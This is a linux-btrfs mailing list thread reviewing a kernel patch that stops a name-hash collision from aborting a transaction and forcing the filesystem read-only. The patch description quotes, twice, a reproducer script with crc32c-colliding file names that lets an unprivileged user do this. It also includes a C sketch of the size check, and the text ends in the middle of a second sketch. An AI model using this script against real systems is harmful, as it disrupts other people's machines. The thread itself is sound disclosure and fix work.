To: Boris Burkov; +Cc: linux-btrfs
On Thu, Feb 26, 2026 at 6:54 PM Boris Burkov <boris@bur.io> wrote:
>
> On Thu, Feb 26, 2026 at 02:33:58PM +0000, fdmanana@kernel.org wrote:
> > From: Filipe Manana <fdmanana@suse.com>
> >
> > If we attempt to create several files with names that result in the same
> > hash, we have to pack them in same dir item and that has a limit inherent
> > to the leaf size. However if we reach that limit, we trigger a transaction
> > abort and turns the filesystem into RO mode. This allows for a malicious
> > user to disrupt a system, without the need to have administration
> > privileges/capabilities.
> >
> > Reproducer:
> >
> > $ cat exploit-hash-collisions.sh
> > #!/bin/bash
> >
> > DEV=/dev/sdi
> > MNT=/mnt/sdi
> >
> > # Use smallest node size to make the test faster and require less file
> > # names that result in hash collision.
> > mkfs.btrfs -f --nodesize 4K $DEV
> > mount $DEV $MNT
> >
> > # List of names that result in the same crc32c hash for btrfs.
> > declare -a names=(
> > 'foobar'
> > '%a8tYkxfGMLWRGr55QSeQc4PBNH9PCLIvR6jZnkDtUUru1t@RouaUe_L:@xGkbO3nCwvLNYeK9vhE628gss:T$yZjZ5l-Nbd6CbC$M=hqE-ujhJICXyIxBvYrIU9-TDC'
> > 'AQci3EUB%shMsg-N%frgU:02ByLs=IPJU0OpgiWit5nexSyxZDncY6WB:=zKZuk5Zy0DD$Ua78%MelgBuMqaHGyKsJUFf9s=UW80PcJmKctb46KveLSiUtNmqrMiL9-Y0I_l5Fnam04CGIg=8@U:Z'
> > 'CvVqJpJzueKcuA$wqwePfyu7VxuWNN3ho$p0zi2H8QFYK$7YlEqOhhb%:hHgjhIjW5vnqWHKNP4'
> > 'ET:vk@rFU4tsvMB0$C_p=xQHaYZjvoF%-BTc%wkFW8yaDAPcCYoR%x$FH5O:'
> > 'HwTon%v7SGSP4FE08jBwwiu5aot2CFKXHTeEAa@38fUcNGOWvE@Mz6WBeDH_VooaZ6AgsXPkVGwy9l@@ZbNXabUU9csiWrrOp0MWUdfi$EZ3w9GkIqtz7I_eOsByOkBOO'
> > 'Ij%2VlFGXSuPvxJGf5UWy6O@1svxGha%b@=%wjkq:CIgE6u7eJOjmQY5qTtxE2Rjbis9@us'
> > 'KBkjG5%9R8K9sOG8UTnAYjxLNAvBmvV5vz3IiZaPmKuLYO03-6asI9lJ_j4@6Xo$KZicaLWJ3Pv8XEwVeUPMwbHYWwbx0pYvNlGMO9F:ZhHAwyctnGy%_eujl%WPd4U2BI7qooOSr85J-C2V$LfY'
> > 'NcRfDfuUQ2=zP8K3CCF5dFcpfiOm6mwenShsAb_F%n6GAGC7fT2JFFn:c35X-3aYwoq7jNX5$ZJ6hI3wnZs$7KgGi7wjulffhHNUxAT0fRRLF39vJ@NvaEMxsMO'
> > 'Oj42AQAEzRoTxa5OuSKIr=A_lwGMy132v4g3Pdq1GvUG9874YseIFQ6QU'
> > 'Ono7avN5GjC:_6dBJ_'
> > 'WHmN2gnmaN-9dVDy4aWo:yNGFzz8qsJyJhWEWcud7$QzN2D9R0efIWWEdu5kwWr73NZm4=@CoCDxrrZnRITr-kGtU_cfW2:%2_am'
> > 'WiFnuTEhAG9FEC6zopQmj-A-$LDQ0T3WULz%ox3UZAPybSV6v1Z$b4L_XBi4M4BMBtJZpz93r9xafpB77r:lbwvitWRyo$odnAUYlYMmU4RvgnNd--e=I5hiEjGLETTtaScWlQp8mYsBovZwM2k'
> > 'XKyH=OsOAF3p%uziGF_ZVr$ivrvhVgD@1u%5RtrV-gl_vqAwHkK@x7YwlxX3qT6WKKQ%PR56NrUBU2dOAOAdzr2=5nJuKPM-T-$ZpQfCL7phxQbUcb:BZOTPaFExc-qK-gDRCDW2'
> > 'd3uUR6OFEwZr%ns1XH_@tbxA@cCPmbBRLdyh7p6V45H$P2$F%w0RqrD3M0g8aGvWpoTFMiBdOTJXjD:JF7=h9a_43xBywYAP%r$SPZi%zDg%ql-KvkdUCtF9OLaQlxmd'
> > 'ePTpbnit%hyNm@WELlpKzNZYOzOTf8EQ$sEfkMy1VOfIUu3coyvIr13-Y7Sv5v-Ivax2Go_GQRFMU1b3362nktT9WOJf3SpT%z8sZmM3gvYQBDgmKI%%RM-G7hyrhgYflOw%z::ZRcv5O:lDCFm'
> > 'evqk743Y@dvZAiG5J05L_ROFV@$2%rVWJ2%3nxV72-W7$e$-SK3tuSHA2mBt$qloC5jwNx33GmQUjD%akhBPu=VJ5g$xhlZiaFtTrjeeM5x7dt4cHpX0cZkmfImndYzGmvwQG:$euFYmXn$_2rA9mKZ'
> > 'gkgUtnihWXsZQTEkrMAWIxir09k3t7jk_IK25t1:cy1XWN0GGqC%FrySdcmU7M8MuPO_ppkLw3=Dfr0UuBAL4%GFk2$Ma10V1jDRGJje%Xx9EV2ERaWKtjpwiZwh0gCSJsj5UL7CR8RtW5opCVFKGGy8Cky'
> > 'hNgsG_8lNRik3PvphqPm0yEH3P%%fYG:kQLY=6O-61Wa6nrV_WVGR6TLB09vHOv%g4VQRP8Gzx7VXUY1qvZyS'
> > 'isA7JVzN12xCxVPJZ_qoLm-pTBuhjjHMvV7o=F:EaClfYNyFGlsfw-Kf%uxdqW-kwk1sPl2vhbjyHU1A6$hz'
> > 'kiJ_fgcdZFDiOptjgH5PN9-PSyLO4fbk_:u5_2tz35lV_iXiJ6cx7pwjTtKy-XGaQ5IefmpJ4N_ZqGsqCsKuqOOBgf9LkUdffHet@Wu'
> > 'lvwtxyhE9:%Q3UxeHiViUyNzJsy:fm38pg_b6s25JvdhOAT=1s0$pG25x=LZ2rlHTszj=gN6M4zHZYr_qrB49i=pA--@WqWLIuX7o1S_SfS@2FSiUZN'
> > 'rC24cw3UBDZ=5qJBUMs9e$=S4Y94ni%Z8639vnrGp=0Hv4z3dNFL0fBLmQ40=EYIY:Z=SLc@QLMSt2zsss2ZXrP7j4='
> > 'uwGl2s-fFrf@GqS=DQqq2I0LJSsOmM%xzTjS:lzXguE3wChdMoHYtLRKPvfaPOZF2fER@j53evbKa7R%A7r4%YEkD=kicJe@SFiGtXHbKe4gCgPAYbnVn'
> > 'UG37U6KKua2bgc:IHzRs7BnB6FD:2Mt5Cc5NdlsW%$1tyvnfz7S27FvNkroXwAW:mBZLA1@qa9WnDbHCDmQmfPMC9z-Eq6QT0jhhPpqyymaD:R02ghwYo%yx7SAaaq-:x33LYpei$5g8DMl3C'
> > 'y2vjek0FE1PDJC0qpfnN:x8k2wCFZ9xiUF2ege=JnP98R%wxjKkdfEiLWvQzmnW'
> > '8-HCSgH5B%K7P8_jaVtQhBXpBk:pE-$P7ts58U0J@iR9YZntMPl7j$s62yAJO@_9eanFPS54b=UTw$94C-t=HLxT8n6o9P=QnIxq-f1=Ne2dvhe6WbjEQtc'
> > 'YPPh:IFt2mtR6XWSmjHptXL_hbSYu8bMw-JP8@PNyaFkdNFsk$M=xfL6LDKCDM-mSyGA_2MBwZ8Dr4=R1D%7-mCaaKGxb990jzaagRktDTyp'
> > '9hD2ApKa_t_7x-a@GCG28kY:7$M@5udI1myQ$x5udtggvagmCQcq9QXWRC5hoB0o-_zHQUqZI5rMcz_kbMgvN5jr63LeYA4Cj-c6F5Ugmx6DgVf@2Jqm%MafecpgooqreJ53P-QTS'
> > )
> >
> > # Now create files with all those names in the same parent directory.
> > # It should not fail since a 4K leaf has enough space for them.
> > for name in "${names[@]}"; do
> > touch $MNT/$name
> > done
> >
> > # Now add one more file name that causes a crc32c hash collision.
> > # This should fail, but it should not turn the filesystem into RO mode
> > # (which could be exploited by malicious users) due to a transaction
> > # abort.
> > touch $MNT/'W6tIm-VK2@BGC@IBfcgg6j_p:pxp_QUqtWpGD5Ok_GmijKOJJt'
> >
> > # Check that we are able to create another file, with a name that does not cause
> > # a crc32c hash collision.
> > echo -n "hello world" > $MNT/baz
> >
> > # Unmount and mount again, verify file baz exists and with the right content.
> > umount $MNT
> > mount $DEV $MNT
> > echo "File baz content: $(cat $MNT/baz)"
> >
> > umount $MNT
> >
> > When running the reproducer:
> >
> > $ ./exploit-hash-collisions.sh
> > (...)
> > touch: cannot touch '/mnt/sdi/W6tIm-VK2@BGC@IBfcgg6j_p:pxp_QUqtWpGD5Ok_GmijKOJJt': Value too large for defined data type
> > ./exploit-hash-collisions.sh: line 57: /mnt/sdi/baz: Read-only file system
> > cat: /mnt/sdi/baz: No such file or directory
> > File baz content:
> >
> > And the transaction abort stack trace in dmesg/syslog:
> >
> > $ dmesg
> > (...)
> > [758240.509761] ------------[ cut here ]------------
> > [758240.510668] BTRFS: Transaction aborted (error -75)
> > [758240.511577] WARNING: fs/btrfs/inode.c:6854 at btrfs_create_new_inode+0x805/0xb50 [btrfs], CPU#6: touch/888644
> > [758240.513513] Modules linked in: btrfs dm_zero (...)
> > [758240.523221] CPU: 6 UID: 0 PID: 888644 Comm: touch Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full)
> > [758240.524621] Tainted: [W]=WARN
> > [758240.525037] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014
> > [758240.526331] RIP: 0010:btrfs_create_new_inode+0x80b/0xb50 [btrfs]
> > [758240.527093] Code: 0f 82 cf (...)
> > [758240.529211] RSP: 0018:ffffce64418fbb48 EFLAGS: 00010292
> > [758240.529935] RAX: 00000000ffffffd3 RBX: 0000000000000000 RCX: 00000000ffffffb5
> > [758240.531040] RDX: 0000000d04f33e06 RSI: 00000000ffffffb5 RDI: ffffffffc0919dd0
> > [758240.531920] RBP: ffffce64418fbc10 R08: 0000000000000000 R09: 00000000ffffffb5
> > [758240.532928] R10: 0000000000000000 R11: ffff8e52c0000000 R12: ffff8e53eee7d0f0
> > [758240.533818] R13: ffff8e57f70932a0 R14: ffff8e5417629568 R15: 0000000000000000
> > [758240.534664] FS: 00007f1959a2a740(0000) GS:ffff8e5b27cae000(0000) knlGS:0000000000000000
> > [758240.535821] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> > [758240.536644] CR2: 00007f1959b10ce0 CR3: 000000012a2cc005 CR4: 0000000000370ef0
> > [758240.537517] Call Trace:
> > [758240.537828] <TASK>
> > [758240.538099] btrfs_create_common+0xbf/0x140 [btrfs]
> > [758240.538760] path_openat+0x111a/0x15b0
> > [758240.539252] do_filp_open+0xc2/0x170
> > [758240.539699] ? preempt_count_add+0x47/0xa0
> > [758240.540200] ? __virt_addr_valid+0xe4/0x1a0
> > [758240.540800] ? __check_object_size+0x1b3/0x230
> > [758240.541661] ? alloc_fd+0x118/0x180
> > [758240.542315] do_sys_openat2+0x70/0xd0
> > [758240.543012] __x64_sys_openat+0x50/0xa0
> > [758240.543723] do_syscall_64+0x50/0xf20
> > [758240.544462] entry_SYSCALL_64_after_hwframe+0x76/0x7e
> > [758240.545397] RIP: 0033:0x7f1959abc687
> > [758240.546019] Code: 48 89 fa (...)
> > [758240.548522] RSP: 002b:00007ffe16ff8690 EFLAGS: 00000202 ORIG_RAX: 0000000000000101
> > [758240.566278] RAX: ffffffffffffffda RBX: 00007f1959a2a740 RCX: 00007f1959abc687
> > [758240.567068] RDX: 0000000000000941 RSI: 00007ffe16ffa333 RDI: ffffffffffffff9c
> > [758240.567860] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
> > [758240.568707] R10: 00000000000001b6 R11: 0000000000000202 R12: 0000561eec7c4b90
> > [758240.569712] R13: 0000561eec7c311f R14: 00007ffe16ffa333 R15: 0000000000000000
> > [758240.570758] </TASK>
> > [758240.571040] ---[ end trace 0000000000000000 ]---
> > [758240.571681] BTRFS: error (device sdi state A) in btrfs_create_new_inode:6854: errno=-75 unknown
> > [758240.572899] BTRFS info (device sdi state EA): forced readonly
> >
> > Fix this by checking for a hash collision, and whether adding a new name is
> > possible, early in btrfs_create_new_inode() before we do any tree updates,
> > so that we don't need to abort the transaction if we can not add the new
> > name due to the leaf size limit.
> >
> > A test case for fstests will be sent soon.
> >
> > Fixes: caae78e03234 ("btrfs: move common inode creation code into btrfs_create_new_inode()")
>
> This fix makes sense but I have two high level questions if you don't
> mind:
>
> I couldn't actually find the place EOVERFLOW is coming from.
> My best guess is:
>
> insert_with_overflow()
> btrfs_insert_empty_item()
> btrfs_insert_empty_items()
> btrfs_search_slot()
> search_leaf()
> split_leaf()
> if (extend && data_size + btrfs_item_size(l, slot) +
> sizeof(struct btrfs_item) > BTRFS_LEAF_DATA_SIZE(fs_info))
> return -EOVERFLOW;
>
> Is that right?
Yes.
> I am a bit confused how this doesn't get caught by the
> check before the call to split leaf
> i.e.,
> if (leaf_free_space < ins_len) // ctree.c:1951
I don't understand your doubt.
It's because the leaf doesn't have enough space that we call
split_leaf(), and that fails with the above if statement you
identified because the extended item size would not fit in a leaf.
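To make the arithmetic concrete, here is a minimal user-space sketch of that
check. It is not the kernel code: leaf_extend_check() is a hypothetical helper
name, and the header and item sizes are assumed values hard-coded for
illustration (the 4K node size comes from the reproducer).

```c
#include <errno.h>
#include <stdint.h>

/* Assumed sizes for illustration only; the kernel derives them from structs. */
#define NODESIZE        4096u  /* mkfs.btrfs --nodesize 4K, as in the reproducer */
#define HEADER_SIZE      101u  /* assumed sizeof(struct btrfs_header) */
#define ITEM_SIZE         25u  /* assumed sizeof(struct btrfs_item) */
#define LEAF_DATA_SIZE  (NODESIZE - HEADER_SIZE)

/*
 * Hypothetical helper mirroring the condition quoted from split_leaf():
 * extending an existing item by data_size bytes fails with -EOVERFLOW when
 * the grown item plus its item header can not fit in a single leaf, no
 * matter how the leaf is split.
 */
static int leaf_extend_check(uint32_t cur_item_size, uint32_t data_size)
{
	if (data_size + cur_item_size + ITEM_SIZE > LEAF_DATA_SIZE)
		return -EOVERFLOW;
	return 0;
}
```

Under these assumptions, leaf_extend_check(3950, 60) fails because
3950 + 60 + 25 exceeds the 3995 bytes of leaf data, while
leaf_extend_check(1000, 60) succeeds. Splitting the leaf can not help in the
first case, since a single item never spans leaves.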
>
>
> Also, would it theoretically be possible to extend the collision
> handling to allow collisions to span leaves, or is there some reason that
> is a complete no-go?
And how would you do that, without changing the on-disk format with
new keys and/or item types?
We would have to have new keys and the data split across several
items, like we did for extrefs over a decade ago.
Thanks.
>
> Regardless of the answers, this is well reasoned, well tested, and a
> clear improvement so please add:
>
> Reviewed-by: Boris Burkov <boris@bur.io>
>
> > Signed-off-by: Filipe Manana <fdmanana@suse.com>
> > ---
> > fs/btrfs/inode.c | 19 +++++++++++++++++++
> > 1 file changed, 19 insertions(+)
> >
> > diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
> > index b9f1bd18ea62..9a26fc5a5263 100644
> > --- a/fs/btrfs/inode.c
> > +++ b/fs/btrfs/inode.c
> > @@ -6635,6 +6635,25 @@ int btrfs_create_new_inode(struct btrfs_trans_handle *trans,
> > int ret;
> > bool xa_reserved = false;
> >
> > + if (!args->orphan && !args->subvol) {
> > + /*
> > + * Before anything else, check if we can add the name to the
> > + * parent directory. We want to avoid a dir item overflow in
> > + * case we have an existing dir item due to existing name
> > + * hash collisions. We do this check here before we call
> > + * btrfs_add_link() down below so that we can avoid a
> > + * transaction abort (which could be exploited by malicious
> > + * users).
> > + *
> > + * For subvolumes we already do this in btrfs_mksubvol().
> > + */
> > + ret = btrfs_check_dir_item_collision(BTRFS_I(dir)->root,
> > + btrfs_ino(BTRFS_I(dir)),
> > + name);
> > + if (ret < 0)
> > + return ret;
> > + }
> > +
> > path = btrfs_alloc_path();
> > if (!path)
> > return -ENOMEM;
> > --
> > 2.47.2
> >
* Re: [PATCH 1/5] btrfs: fix transaction abort on file creation due to name hash collision
2026-02-26 21:24 ` Filipe Manana
@ 2026-02-26 21:29 ` Boris Burkov
0 siblings, 0 replies; 15+ messages in thread
From: Boris Burkov @ 2026-02-26 21:29 UTC (permalink / raw)
To: Filipe Manana; +Cc: linux-btrfs
On Thu, Feb 26, 2026 at 09:24:20PM +0000, Filipe Manana wrote:
> On Thu, Feb 26, 2026 at 6:54 PM Boris Burkov <boris@bur.io> wrote:
> >
> > On Thu, Feb 26, 2026 at 02:33:58PM +0000, fdmanana@kernel.org wrote:
> > > From: Filipe Manana <fdmanana@suse.com>
> > >
> > > If we attempt to create several files with names that result in the same
> > > hash, we have to pack them in same dir item and that has a limit inherent
> > > to the leaf size. However if we reach that limit, we trigger a transaction
> > > abort and turns the filesystem into RO mode. This allows for a malicious
> > > user to disrupt a system, without the need to have administration
> > > privileges/capabilities.
> > >
> > > Reproducer:
> > >
> > > $ cat exploit-hash-collisions.sh
> > > #!/bin/bash
> > >
> > > DEV=/dev/sdi
> > > MNT=/mnt/sdi
> > >
> > > # Use smallest node size to make the test faster and require less file
> > > # names that result in hash collision.
> > > mkfs.btrfs -f --nodesize 4K $DEV
> > > mount $DEV $MNT
> > >
> > > # List of names that result in the same crc32c hash for btrfs.
> > > declare -a names=(
> > > 'foobar'
> > > '%a8tYkxfGMLWRGr55QSeQc4PBNH9PCLIvR6jZnkDtUUru1t@RouaUe_L:@xGkbO3nCwvLNYeK9vhE628gss:T$yZjZ5l-Nbd6CbC$M=hqE-ujhJICXyIxBvYrIU9-TDC'
> > > 'AQci3EUB%shMsg-N%frgU:02ByLs=IPJU0OpgiWit5nexSyxZDncY6WB:=zKZuk5Zy0DD$Ua78%MelgBuMqaHGyKsJUFf9s=UW80PcJmKctb46KveLSiUtNmqrMiL9-Y0I_l5Fnam04CGIg=8@U:Z'
> > > 'CvVqJpJzueKcuA$wqwePfyu7VxuWNN3ho$p0zi2H8QFYK$7YlEqOhhb%:hHgjhIjW5vnqWHKNP4'
> > > 'ET:vk@rFU4tsvMB0$C_p=xQHaYZjvoF%-BTc%wkFW8yaDAPcCYoR%x$FH5O:'
> > > 'HwTon%v7SGSP4FE08jBwwiu5aot2CFKXHTeEAa@38fUcNGOWvE@Mz6WBeDH_VooaZ6AgsXPkVGwy9l@@ZbNXabUU9csiWrrOp0MWUdfi$EZ3w9GkIqtz7I_eOsByOkBOO'
> > > 'Ij%2VlFGXSuPvxJGf5UWy6O@1svxGha%b@=%wjkq:CIgE6u7eJOjmQY5qTtxE2Rjbis9@us'
> > > 'KBkjG5%9R8K9sOG8UTnAYjxLNAvBmvV5vz3IiZaPmKuLYO03-6asI9lJ_j4@6Xo$KZicaLWJ3Pv8XEwVeUPMwbHYWwbx0pYvNlGMO9F:ZhHAwyctnGy%_eujl%WPd4U2BI7qooOSr85J-C2V$LfY'
> > > 'NcRfDfuUQ2=zP8K3CCF5dFcpfiOm6mwenShsAb_F%n6GAGC7fT2JFFn:c35X-3aYwoq7jNX5$ZJ6hI3wnZs$7KgGi7wjulffhHNUxAT0fRRLF39vJ@NvaEMxsMO'
> > > 'Oj42AQAEzRoTxa5OuSKIr=A_lwGMy132v4g3Pdq1GvUG9874YseIFQ6QU'
> > > 'Ono7avN5GjC:_6dBJ_'
> > > 'WHmN2gnmaN-9dVDy4aWo:yNGFzz8qsJyJhWEWcud7$QzN2D9R0efIWWEdu5kwWr73NZm4=@CoCDxrrZnRITr-kGtU_cfW2:%2_am'
> > > 'WiFnuTEhAG9FEC6zopQmj-A-$LDQ0T3WULz%ox3UZAPybSV6v1Z$b4L_XBi4M4BMBtJZpz93r9xafpB77r:lbwvitWRyo$odnAUYlYMmU4RvgnNd--e=I5hiEjGLETTtaScWlQp8mYsBovZwM2k'
> > > 'XKyH=OsOAF3p%uziGF_ZVr$ivrvhVgD@1u%5RtrV-gl_vqAwHkK@x7YwlxX3qT6WKKQ%PR56NrUBU2dOAOAdzr2=5nJuKPM-T-$ZpQfCL7phxQbUcb:BZOTPaFExc-qK-gDRCDW2'
> > > 'd3uUR6OFEwZr%ns1XH_@tbxA@cCPmbBRLdyh7p6V45H$P2$F%w0RqrD3M0g8aGvWpoTFMiBdOTJXjD:JF7=h9a_43xBywYAP%r$SPZi%zDg%ql-KvkdUCtF9OLaQlxmd'
> > > 'ePTpbnit%hyNm@WELlpKzNZYOzOTf8EQ$sEfkMy1VOfIUu3coyvIr13-Y7Sv5v-Ivax2Go_GQRFMU1b3362nktT9WOJf3SpT%z8sZmM3gvYQBDgmKI%%RM-G7hyrhgYflOw%z::ZRcv5O:lDCFm'
> > > 'evqk743Y@dvZAiG5J05L_ROFV@$2%rVWJ2%3nxV72-W7$e$-SK3tuSHA2mBt$qloC5jwNx33GmQUjD%akhBPu=VJ5g$xhlZiaFtTrjeeM5x7dt4cHpX0cZkmfImndYzGmvwQG:$euFYmXn$_2rA9mKZ'
> > > 'gkgUtnihWXsZQTEkrMAWIxir09k3t7jk_IK25t1:cy1XWN0GGqC%FrySdcmU7M8MuPO_ppkLw3=Dfr0UuBAL4%GFk2$Ma10V1jDRGJje%Xx9EV2ERaWKtjpwiZwh0gCSJsj5UL7CR8RtW5opCVFKGGy8Cky'
> > > 'hNgsG_8lNRik3PvphqPm0yEH3P%%fYG:kQLY=6O-61Wa6nrV_WVGR6TLB09vHOv%g4VQRP8Gzx7VXUY1qvZyS'
> > > 'isA7JVzN12xCxVPJZ_qoLm-pTBuhjjHMvV7o=F:EaClfYNyFGlsfw-Kf%uxdqW-kwk1sPl2vhbjyHU1A6$hz'
> > > 'kiJ_fgcdZFDiOptjgH5PN9-PSyLO4fbk_:u5_2tz35lV_iXiJ6cx7pwjTtKy-XGaQ5IefmpJ4N_ZqGsqCsKuqOOBgf9LkUdffHet@Wu'
> > > 'lvwtxyhE9:%Q3UxeHiViUyNzJsy:fm38pg_b6s25JvdhOAT=1s0$pG25x=LZ2rlHTszj=gN6M4zHZYr_qrB49i=pA--@WqWLIuX7o1S_SfS@2FSiUZN'
> > > 'rC24cw3UBDZ=5qJBUMs9e$=S4Y94ni%Z8639vnrGp=0Hv4z3dNFL0fBLmQ40=EYIY:Z=SLc@QLMSt2zsss2ZXrP7j4='
> > > 'uwGl2s-fFrf@GqS=DQqq2I0LJSsOmM%xzTjS:lzXguE3wChdMoHYtLRKPvfaPOZF2fER@j53evbKa7R%A7r4%YEkD=kicJe@SFiGtXHbKe4gCgPAYbnVn'
> > > 'UG37U6KKua2bgc:IHzRs7BnB6FD:2Mt5Cc5NdlsW%$1tyvnfz7S27FvNkroXwAW:mBZLA1@qa9WnDbHCDmQmfPMC9z-Eq6QT0jhhPpqyymaD:R02ghwYo%yx7SAaaq-:x33LYpei$5g8DMl3C'
> > > 'y2vjek0FE1PDJC0qpfnN:x8k2wCFZ9xiUF2ege=JnP98R%wxjKkdfEiLWvQzmnW'
> > > '8-HCSgH5B%K7P8_jaVtQhBXpBk:pE-$P7ts58U0J@iR9YZntMPl7j$s62yAJO@_9eanFPS54b=UTw$94C-t=HLxT8n6o9P=QnIxq-f1=Ne2dvhe6WbjEQtc'
> > > 'YPPh:IFt2mtR6XWSmjHptXL_hbSYu8bMw-JP8@PNyaFkdNFsk$M=xfL6LDKCDM-mSyGA_2MBwZ8Dr4=R1D%7-mCaaKGxb990jzaagRktDTyp'
> > > '9hD2ApKa_t_7x-a@GCG28kY:7$M@5udI1myQ$x5udtggvagmCQcq9QXWRC5hoB0o-_zHQUqZI5rMcz_kbMgvN5jr63LeYA4Cj-c6F5Ugmx6DgVf@2Jqm%MafecpgooqreJ53P-QTS'
> > > )
> > >
> > > # Now create files with all those names in the same parent directory.
> > > # It should not fail since a 4K leaf has enough space for them.
> > > for name in "${names[@]}"; do
> > > touch $MNT/$name
> > > done
> > >
> > > # Now add one more file name that causes a crc32c hash collision.
> > > # This should fail, but it should not turn the filesystem into RO mode
> > > # (which could be exploited by malicious users) due to a transaction
> > > # abort.
> > > touch $MNT/'W6tIm-VK2@BGC@IBfcgg6j_p:pxp_QUqtWpGD5Ok_GmijKOJJt'
> > >
> > > # Check that we are able to create another file, with a name that does not cause
> > > # a crc32c hash collision.
> > > echo -n "hello world" > $MNT/baz
> > >
> > > # Unmount and mount again, verify file baz exists and with the right content.
> > > umount $MNT
> > > mount $DEV $MNT
> > > echo "File baz content: $(cat $MNT/baz)"
> > >
> > > umount $MNT
> > >
> > > When running the reproducer:
> > >
> > > $ ./exploit-hash-collisions.sh
> > > (...)
> > > touch: cannot touch '/mnt/sdi/W6tIm-VK2@BGC@IBfcgg6j_p:pxp_QUqtWpGD5Ok_GmijKOJJt': Value too large for defined data type
> > > ./exploit-hash-collisions.sh: line 57: /mnt/sdi/baz: Read-only file system
> > > cat: /mnt/sdi/baz: No such file or directory
> > > File baz content:
> > >
> > > And the transaction abort stack trace in dmesg/syslog:
> > >
> > > $ dmesg
> > > (...)
> > > [758240.509761] ------------[ cut here ]------------
> > > [758240.510668] BTRFS: Transaction aborted (error -75)
> > > [758240.511577] WARNING: fs/btrfs/inode.c:6854 at btrfs_create_new_inode+0x805/0xb50 [btrfs], CPU#6: touch/888644
> > > [758240.513513] Modules linked in: btrfs dm_zero (...)
> > > [758240.523221] CPU: 6 UID: 0 PID: 888644 Comm: touch Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full)
> > > [758240.524621] Tainted: [W]=WARN
> > > [758240.525037] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014
> > > [758240.526331] RIP: 0010:btrfs_create_new_inode+0x80b/0xb50 [btrfs]
> > > [758240.527093] Code: 0f 82 cf (...)
> > > [758240.529211] RSP: 0018:ffffce64418fbb48 EFLAGS: 00010292
> > > [758240.529935] RAX: 00000000ffffffd3 RBX: 0000000000000000 RCX: 00000000ffffffb5
> > > [758240.531040] RDX: 0000000d04f33e06 RSI: 00000000ffffffb5 RDI: ffffffffc0919dd0
> > > [758240.531920] RBP: ffffce64418fbc10 R08: 0000000000000000 R09: 00000000ffffffb5
> > > [758240.532928] R10: 0000000000000000 R11: ffff8e52c0000000 R12: ffff8e53eee7d0f0
> > > [758240.533818] R13: ffff8e57f70932a0 R14: ffff8e5417629568 R15: 0000000000000000
> > > [758240.534664] FS: 00007f1959a2a740(0000) GS:ffff8e5b27cae000(0000) knlGS:0000000000000000
> > > [758240.535821] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> > > [758240.536644] CR2: 00007f1959b10ce0 CR3: 000000012a2cc005 CR4: 0000000000370ef0
> > > [758240.537517] Call Trace:
> > > [758240.537828] <TASK>
> > > [758240.538099] btrfs_create_common+0xbf/0x140 [btrfs]
> > > [758240.538760] path_openat+0x111a/0x15b0
> > > [758240.539252] do_filp_open+0xc2/0x170
> > > [758240.539699] ? preempt_count_add+0x47/0xa0
> > > [758240.540200] ? __virt_addr_valid+0xe4/0x1a0
> > > [758240.540800] ? __check_object_size+0x1b3/0x230
> > > [758240.541661] ? alloc_fd+0x118/0x180
> > > [758240.542315] do_sys_openat2+0x70/0xd0
> > > [758240.543012] __x64_sys_openat+0x50/0xa0
> > > [758240.543723] do_syscall_64+0x50/0xf20
> > > [758240.544462] entry_SYSCALL_64_after_hwframe+0x76/0x7e
> > > [758240.545397] RIP: 0033:0x7f1959abc687
> > > [758240.546019] Code: 48 89 fa (...)
> > > [758240.548522] RSP: 002b:00007ffe16ff8690 EFLAGS: 00000202 ORIG_RAX: 0000000000000101
> > > [758240.566278] RAX: ffffffffffffffda RBX: 00007f1959a2a740 RCX: 00007f1959abc687
> > > [758240.567068] RDX: 0000000000000941 RSI: 00007ffe16ffa333 RDI: ffffffffffffff9c
> > > [758240.567860] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
> > > [758240.568707] R10: 00000000000001b6 R11: 0000000000000202 R12: 0000561eec7c4b90
> > > [758240.569712] R13: 0000561eec7c311f R14: 00007ffe16ffa333 R15: 0000000000000000
> > > [758240.570758] </TASK>
> > > [758240.571040] ---[ end trace 0000000000000000 ]---
> > > [758240.571681] BTRFS: error (device sdi state A) in btrfs_create_new_inode:6854: errno=-75 unknown
> > > [758240.572899] BTRFS info (device sdi state EA): forced readonly
> > >
> > > Fix this by checking for a hash collision, and whether adding a new name
> > > is possible, early in btrfs_create_new_inode() before we do any tree updates,
> > > so that we don't need to abort the transaction if we can not add the new
> > > name due to the leaf size limit.
> > >
> > > A test case for fstests will be sent soon.
> > >
> > > Fixes: caae78e03234 ("btrfs: move common inode creation code into btrfs_create_new_inode()")
> >
> > This fix makes sense but I have two high level questions if you don't
> > mind:
> >
> > I couldn't actually find the place EOVERFLOW is coming from.
> > My best guess is:
> >
> > insert_with_overflow()
> > btrfs_insert_empty_item()
> > btrfs_insert_empty_items()
> > btrfs_search_slot()
> > search_leaf()
> > split_leaf()
> > if (extend && data_size + btrfs_item_size(l, slot) +
> > sizeof(struct btrfs_item) > BTRFS_LEAF_DATA_SIZE(fs_info))
> > return -EOVERFLOW;
> >
> > Is that right?
>
> Yes.
>
Thanks
> > I am a bit confused how this doesn't get caught by the
> > check before the call to split leaf
> > i.e.,
> > if (leaf_free_space < ins_len) // ctree.c:1951
>
> I don't understand your doubt.
> It's because the leaf doesn't have enough space that we call
> split_leaf(), and that fails with the above if statement you
> identified because the extended item size would not fit in a leaf.
>
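The size check discussed above can be sketched in isolation as follows. This is an illustration only: the constants SKETCH_HEADER_SIZE and SKETCH_ITEM_SIZE are assumed values for sizeof(struct btrfs_header) and sizeof(struct btrfs_item), and the functions leaf_data_size() and check_extend_item() are hypothetical stand-ins, not kernel code:

```c
#include <assert.h>
#include <errno.h>
#include <stdint.h>

/* Assumed on-disk sizes, hard-coded for illustration only. */
#define SKETCH_HEADER_SIZE 101u /* assumed sizeof(struct btrfs_header) */
#define SKETCH_ITEM_SIZE    25u /* assumed sizeof(struct btrfs_item) */

/* Bytes available for items and their data in one leaf. */
static uint32_t leaf_data_size(uint32_t nodesize)
{
	assert(nodesize > SKETCH_HEADER_SIZE);
	return nodesize - SKETCH_HEADER_SIZE;
}

/*
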